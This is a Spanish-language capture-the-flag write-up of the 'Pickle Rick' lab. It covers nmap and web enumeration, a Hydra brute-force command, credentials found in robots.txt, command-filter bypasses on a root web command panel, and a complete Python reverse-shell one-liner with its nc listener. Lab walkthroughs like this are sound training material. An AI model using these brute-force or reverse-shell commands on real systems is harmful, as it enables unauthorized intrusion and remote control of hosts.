# Pickle Rick

IP objetivo:

<aside>
💡

**10.64.147.169**

</aside>

Ahora es necesario realizar un escaneo nmap para ver todos los servicios activos en el host:

nmap -T5 -sCV -p- -Pn -sS --stats-every=3s 10.64.147.169

Obteniendo como resultado:

![image.png](image.png)

En este caso, los servicios encontrados son HTTP (80) y SSH (22). Primeramente, nos enfocamos en el servicio SSH, por lo que ingresamos a él en busca de cualquier pista al descubierto:

![image.png](image%201.png)

Con base en el texto, podemos deducir que se necesita una contraseña para iniciar sesión en un servicio o apartado del sitio web (servicio SSH o algún panel de login en el sitio web). Además, en la imagen vemos que se menciona el nombre de “Morty”, quien puede ser un usuario potencial. Lo siguiente es revisar el código fuente, utilizar whatweb para el sitio, además de un dirbuster para búsqueda de directorios nuevos y un escaneo con Nikto:

whatweb (para buscar tecnologías presentes en el sitio web e información útil):

whatweb http://10.64.147.169

![image.png](image%202.png)

nikto (posibles exploits o vulnerabilidades en el sitio):

nikto -h http://10.64.147.169

![image.png](image%203.png)

dirbuster:

![image.png](image%204.png)

Código fuente de la página principal:

![image.png](image%205.png)

Resultando en el descubrimiento del usuario en el código fuente: “R1ckRul3s” y un directorio de inicio de sesión:

![image.png](image%206.png)

![image.png](image%207.png)

Dado que no tenemos una contraseña como tal, debemos realizar un ataque de fuerza bruta con Hydra. Para esto, utilizaremos los 2 posibles usuarios: “R1ckRul3s” y “Morty”:

hydra -l 'R1ckRul3s' -P /usr/share/wordlists/rockyou.txt 10.64.147.169 http-post-form "/login.php:username=^USER^&password=^PASSWORD^&sub=Login:Invalid username or password" -t 64 -F

sin éxito:

![image.png](image%208.png)

Pero en el archivo robots, existe un texto sospechoso:

![image.png](image%209.png)

Una posible contraseña y al probarlas, descubrimos que son correctas: “R1ckRul3s:Wubbalubbadubdub”

![image.png](image%2010.png)

Por lo que ahora, podemos inspeccionar el sitio, dentro de este en el codigo fuente encontramos lo siguiente:

![image.png](image%2011.png)

Parece ser un texto codificado en base64, por lo que decodificamos de la siguiente manera:

Lo cual resulta en otro base 64:

![image.png](image%2012.png)

y otro más:

![image.png](image%2013.png)

y otro:

![image.png](image%2014.png)

y otro:

![image.png](image%2015.png)

y otro:

![image.png](image%2016.png)

y otro:

![image.png](image%2017.png)

y otro:

![image.png](image%2018.png)

hasta llegar a un agujero de conejo, por lo que el verdadero exploit es el siguiente (el apartado donde se pueden ejecutar comandos):

![image.png](image%2019.png)

![image.png](image%2020.png)

El cual nos permite ejecutar comandos directamente en el host con permisos de root, sin restricciones, actuando como una web shell:

![image.png](image%2021.png)

![image.png](image%2022.png)

![image.png](image%2023.png)

Observando que existe una lista de comandos baneados, por lo que procedemos a enumerar usuarios:

![image.png](image%2024.png)

Por lo que utilizamos la variante “getent passwd”:

![image.png](image%2025.png)

y descubrimos al usuario ubuntu, podemos intentar ver su directorio:

![image.png](image%2026.png)

Pero en el camino encontramos un directorio llamado rick, pero no existe un usuario rick, por lo que lo listaremos también:

![image.png](image%2027.png)

Al final, terminó siendo un directorio creado por el usuario root y contiene la segunda flag:

![image.png](image%2028.png)

También de paso, descubrimos que lo que está baneado es la palabra “cat”, por lo que podemos reemplazarla con less. Con esto, podemos encontrar las demás flags.

En el directorio de Ubuntu encontramos lo siguiente:

![image.png](image%2029.png)

Rastros de archivos: en este punto, dado que podemos ejecutar cualquier comando, podemos crear una reverse shell para más comodidad, de la siguiente manera (se usó Python porque el host no contaba con otras herramientas como nc):

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("192.168.203.116",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")’

Pero antes nos ponemos en modo escucha:

nc -lvnp 4444

![image.png](image%2030.png)

Ahora podemos navegar cómodamente por el host y dado que tenemos permisos root, podemos listar su directorio y contenido:

![image.png](image%2031.png)

Con esto finalizamos con las 3 flags y completamos el reto de manera exitosa:

![image.png](image%2032.png)